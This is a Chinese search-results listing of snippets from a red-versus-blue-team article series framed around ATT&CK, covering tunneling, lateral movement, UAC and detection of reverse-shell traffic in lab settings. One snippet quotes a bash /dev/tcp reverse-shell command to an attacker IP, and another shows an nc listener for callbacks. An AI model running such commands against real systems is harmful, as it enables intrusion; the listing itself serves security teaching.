首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗之UAC用户账户控制

    用户帐户控制(User Account Control,UAC)为Windows Vista中所推出的安全技术之一,其主要特点在于通过限制应用软件对系统层级的访问,从而改进Windows操作系统的安全性。虽然此类机能一直遭到部分用户的批评,但后续的Windows操作系统仍保留此类机能。如Windows 7中,微软公司保留并改进了此项功能(自定义UAC的安全等级)。

    1.1K10编辑于 2024-01-22
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解

    从技术层面来讲,隧道是一种通过互联网的基础设施在网络之间传递数据的方式,其中包括数据封装、传输和解包在内的全过程,使用隧道传递的数据(或负载)可以使用不同协议的数据帧或包。

    2.2K73编辑于 2023-10-29
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法

      前文推荐: ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解 ATT&CK视角下的红蓝对抗:二. 内网探测协议出网 ATT&CK视角下的红蓝对抗:三. c "bash -i >& /dev/tcp/192.168.0.2/8888 0>&1命令来将shell反弹到攻击机上,其中192.168.0.2是攻击机的IP地址,8888是所监听的端口,如图1-11

    1.8K102编辑于 2023-10-31
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗之Windows访问控制模型

    访问控制模型(Access Control Model)是指Windows操作系统关于安全性的一个概念,由访问令牌和安全描述符两部分构成,其中访问令牌是指由当前登录的Windows账号的用户持有,其中会包含了该账号的基础信息,包括用户帐户的标识和特权信息,安全描述符由要访问的对象持有,里面会包含当前对象的安全信息。假设当用户登录时,操作系统会对用户的帐户名和密码进行身份验证, 当登录成功时,系统会自动分配访问令牌(Access Token),访问令牌包含安全标识符,用于标识用户的帐户以及该用户所属的任何组帐户,当我们去创建一个进程也就是访问一个资源(进程资源)的时候,Access Token会被复制一份给进程,进程通过它的创建者所给它设置的安全描述符中的ACL来判断我们是否可以去访问,是否有权限去执行某步操作。

    1.1K10编辑于 2024-01-20
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:二. 内网探测协议出网

    然后通过"type C:\robots.txt "命令读取查看,验证其存在,如若正常则证明探测出网成功,如图1-11所示。

    2.7K162编辑于 2023-10-30
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:十四.内网穿透之反弹流量分析与检测方法

    二.前文推荐 ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解 ATT&CK视角下的红蓝对抗:二. 内网探测协议出网 ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法 ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透 ATT&CK视角下的红蓝对抗:五. 内网穿透之利用HTTP协议进行隧道穿透 ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透 ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透 ATT&CK视角下的红蓝对抗 :八.内网穿透之利用Termite进行隧道穿透 ATT&CK视角下的红蓝对抗:九.内网穿透之利用GRE协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十.内网穿透之利用DNS协议进行隧道穿透 ATT 这里是查看有无bash/sh连接到远端地址,如图1-11所示。 2)通过ps -ef,查看有无反弹shell的常见命令,如图1-12所示。

    1.7K50编辑于 2023-11-11
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:二十.横向移动之利用PTT(票据传递)进行横向渗透

    二.前文推荐 ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解 ATT&CK视角下的红蓝对抗:二. 内网探测协议出网 ATT&CK视角下的红蓝对抗:三. 内网穿透之利用HTTP协议进行隧道穿透 ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透 ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透 ATT&CK视角下的红蓝对抗 文件传输技巧详解 ATT&CK视角下的红蓝对抗:十四.内网穿透之反弹流量分析与检测方法 ATT&CK视角下的红蓝对抗:十五.内网穿透之利用ICMP协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十六.横向移动之利用 Windows计划任务进行横向移动 ATT&CK视角下的红蓝对抗:十七.横向移动之利用远程服务进行横向渗透 ATT&CK视角下的红蓝对抗:十八.横向移动之利用WinRM进行横向渗透 ATT&CK视角下的红蓝对抗 使用命令dir \\192.168.1.2\C$远程查看域控的C盘目录下的文件,命令执行结果如图1-11所示,可以看到已经能够访问域控下文件。

    98540编辑于 2023-11-17
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透

    前文推荐:ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解ATT&CK视角下的红蓝对抗:二. 内网探测协议出网ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透ATT&CK视角下的红蓝对抗:五. 内网穿透之利用HTTP协议进行隧道穿透ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透一. 本次实验环境如图1-11所示,本次实验环境表如表1-1所示。 命令,执行成功即可达到隧道节点通讯加密的效果,如图1-11所示。

    1.3K41编辑于 2023-11-04
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:十八.横向移动之利用WinRM进行横向渗透

    二.前文推荐 ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解 ATT&CK视角下的红蓝对抗:二. 内网探测协议出网 ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法 ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透 ATT&CK视角下的红蓝对抗:五. 内网穿透之利用HTTP协议进行隧道穿透 ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透 ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透 ATT&CK视角下的红蓝对抗 文件传输技巧详解 ATT&CK视角下的红蓝对抗:十四.内网穿透之反弹流量分析与检测方法 ATT&CK视角下的红蓝对抗:十五.内网穿透之利用ICMP协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十六.横向移动之利用 2)使用命令nc -lvnp 1345监听回连端口,命令执行结果如图1-11所示。

    1.1K60编辑于 2023-11-16
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:十六.横向移动之利用Windows计划任务进行横向移动

    二.前文推荐 ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解 ATT&CK视角下的红蓝对抗:二. 内网探测协议出网 ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法 ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透 ATT&CK视角下的红蓝对抗:五. 内网穿透之利用HTTP协议进行隧道穿透 ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透 ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透 ATT&CK视角下的红蓝对抗 :八.内网穿透之利用Termite进行隧道穿透 ATT&CK视角下的红蓝对抗:九.内网穿透之利用GRE协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十.内网穿透之利用DNS协议进行隧道穿透 ATT &CK视角下的红蓝对抗:十一.内网穿透之利用SSH协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十二.内网穿透之Windows文件传输技术详解 ATT&CK视角下的红蓝对抗:十三.内网穿透之Linux

    85650编辑于 2023-11-15
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:十七.横向移动之利用远程服务进行横向渗透

    二.前文推荐 ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解 ATT&CK视角下的红蓝对抗:二. 内网探测协议出网 ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法 ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透 ATT&CK视角下的红蓝对抗:五. 内网穿透之利用HTTP协议进行隧道穿透 ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透 ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透 ATT&CK视角下的红蓝对抗 文件传输技巧详解 ATT&CK视角下的红蓝对抗:十四.内网穿透之反弹流量分析与检测方法 ATT&CK视角下的红蓝对抗:十五.内网穿透之利用ICMP协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十六.横向移动之利用 Administrator Password@123" 执行结果如图1-10,最终效果如图1-11所示。

    72540编辑于 2023-11-16
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:八.内网穿透之利用Termite进行隧道穿透

    2)我们访问kali攻击机本地的8080端口,即可访问Web服务器的80端口服务,如图1-11所示。

    1K41编辑于 2023-11-06
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透

     前文推荐:ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解ATT&CK视角下的红蓝对抗:二. 内网探测协议出网ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透ATT&CK视角下的红蓝对抗:五. 内网穿透之利用HTTP协议进行隧道穿透ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透一. 3) 在Web服务器部署frps服务端,修改服务端frps.ini配置文件,如图1-11所示,执行frps.exe -c frps.ini命令开启服务端,这里在Web服务器开启监听7000端口,稍后用于

    2K80编辑于 2023-11-03
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:二十二.横向移动之利用RDP进行横向渗透

    二.前文推荐 ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解 ATT&CK视角下的红蓝对抗:二. 内网探测协议出网 ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法 ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透 ATT&CK视角下的红蓝对抗:五. 内网穿透之利用HTTP协议进行隧道穿透 ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透 ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透 ATT&CK视角下的红蓝对抗 文件传输技巧详解 ATT&CK视角下的红蓝对抗:十四.内网穿透之反弹流量分析与检测方法 ATT&CK视角下的红蓝对抗:十五.内网穿透之利用ICMP协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十六.横向移动之利用 Windows计划任务进行横向移动 ATT&CK视角下的红蓝对抗:十七.横向移动之利用远程服务进行横向渗透 ATT&CK视角下的红蓝对抗:十八.横向移动之利用WinRM进行横向渗透 ATT&CK视角下的红蓝对抗

    1.7K40编辑于 2023-11-20
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透

     前文推荐: ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解 ATT&CK视角下的红蓝对抗:二. 内网探测协议出网 ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法 ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透 一. 3)在攻击机中修改 proxychains4.conf配置文件,并在其底部添加一行socks5 192.168.0.25 7777参数来完成 proxychains代理配置,如图1-11所示。

    2.1K152编辑于 2023-11-01
  • 来自专栏betasec

    ATT&CK浅析

    1.1 ATT&CK发展历程 ATT&CK模型可以说在众多安全框架模型中发展最为迅速。 图1-4 ATT&CK攻击矩阵 图1-5 ATT&CK导航器 ATT&CK导航工具(Navigator)是一个很有用的工具,可用于映射针对ATT&CK技术的控制措施。 战略威胁情报 战略威胁情报(Strategic Threat Intelligence)提供一个全局视角看待威胁环境和业务问题,它的目的是告知执行董事会和高层人员的决策。 如图2-11所示为列举的常用工具和相关指令,如图2-12所示为cobaltstrike工具示例。 图2-11 黑客组织常用工具 图2-12 cobalt strike 工具 如今许多公司已经开始展开基于ATT&CK模型的安全测试与红队建设,接下来将介绍基于ATT&CK框架的模拟攻击操作流程,如图2

    4.6K20编辑于 2022-12-11
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:十一.内网穿透之利用SSH协议进行隧道穿透

    二.前文推荐ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解ATT&CK视角下的红蓝对抗:二. 内网探测协议出网ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透ATT&CK视角下的红蓝对抗:五. 内网穿透之利用HTTP协议进行隧道穿透ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透ATT&CK视角下的红蓝对抗 :八.内网穿透之利用Termite进行隧道穿透ATT&CK视角下的红蓝对抗:九.内网穿透之利用GRE协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十.内网穿透之利用DNS协议进行隧道穿透 ATT&CK 视角下的红蓝对抗:十一.内网穿透之利用SSH协议进行隧道穿透三 利用SSH协议进行隧道穿透 在实际环境中,绝大部分的Linux或Unix服务器和网络设备都支持SSH协议,内网中主机设备及边界防火墙都会允许

    1.1K100编辑于 2023-11-08
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:十.内网穿透之利用DNS协议进行隧道穿透

    二.前文推荐ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解ATT&CK视角下的红蓝对抗:二. 内网探测协议出网ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透ATT&CK视角下的红蓝对抗:五. 内网穿透之利用HTTP协议进行隧道穿透ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透ATT&CK视角下的红蓝对抗 :八.内网穿透之利用Termite进行隧道穿透ATT&CK视角下的红蓝对抗:九.内网穿透之利用GRE协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十.内网穿透之利用DNS协议进行隧道穿透 三.利用DNS 图1-10客户端连接服务端 3)此时目标服务器会多出一条虚拟网卡,这个网卡就是我们执行后建立的通讯网卡,查看其IP为192.168.10.2,与上述DNS自定义网卡一致,证明搭建隧道成功,如图1-11

    1.2K110编辑于 2023-11-07
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:十三.内网穿透之Linux文件传输技巧详解

    二.前文推荐ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解ATT&CK视角下的红蓝对抗:二. 内网探测协议出网ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透ATT&CK视角下的红蓝对抗:五. 内网穿透之利用HTTP协议进行隧道穿透ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透ATT&CK视角下的红蓝对抗 :八.内网穿透之利用Termite进行隧道穿透ATT&CK视角下的红蓝对抗:九.内网穿透之利用GRE协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十.内网穿透之利用DNS协议进行隧道穿透 ATT&CK 视角下的红蓝对抗:十一.内网穿透之利用SSH协议进行隧道穿透ATT&CK视角下的红蓝对抗:十二.内网穿透之Windows文件传输技术详解ATT&CK视角下的红蓝对抗:十三.内网穿透之Linux文件传输技巧详解三

    71281编辑于 2023-11-10
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:十五.内网穿透之利用ICMP协议进行隧道穿透

    二.前文推荐 ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解 ATT&CK视角下的红蓝对抗:二. 内网探测协议出网 ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法 ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透 ATT&CK视角下的红蓝对抗:五. 内网穿透之利用HTTP协议进行隧道穿透 ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透 ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透 ATT&CK视角下的红蓝对抗 :八.内网穿透之利用Termite进行隧道穿透 ATT&CK视角下的红蓝对抗:九.内网穿透之利用GRE协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十.内网穿透之利用DNS协议进行隧道穿透 ATT &CK视角下的红蓝对抗:十一.内网穿透之利用SSH协议进行隧道穿透 ATT&CK视角下的红蓝对抗:十二.内网穿透之Windows文件传输技术详解 ATT&CK视角下的红蓝对抗:十三.内网穿透之Linux

    95760编辑于 2023-11-12
领券